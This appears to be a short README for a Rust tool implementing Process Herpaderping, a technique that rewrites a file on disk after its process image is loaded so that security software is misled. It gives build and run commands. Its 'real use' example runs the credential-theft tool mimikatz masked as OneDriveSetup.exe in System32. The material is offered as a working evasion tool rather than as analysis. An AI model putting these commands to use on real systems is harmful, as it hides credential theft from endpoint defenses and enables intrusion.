Process Herpaderping is a technique that aims to hide the true intentions of a process by altering the disk contents after the process image has already been loaded into memory. This procedure causes an unusual reaction in both security systems and the operating system itself.
To execute the file, pass the EXE file that will be executed:
cargo run -- <file.exe> <args> <path>
target/release/process_herpaderping.exe <file.exe> <args> <path>
Real use:
target/release/process_herpaderping.exe mimikatz.exe "coffee localtime" C:\Windows\System32\OneDriveSetup.exe